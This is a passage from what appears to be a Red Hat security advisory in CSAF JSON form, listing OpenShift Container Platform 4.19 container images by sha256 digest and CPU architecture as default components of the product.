"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
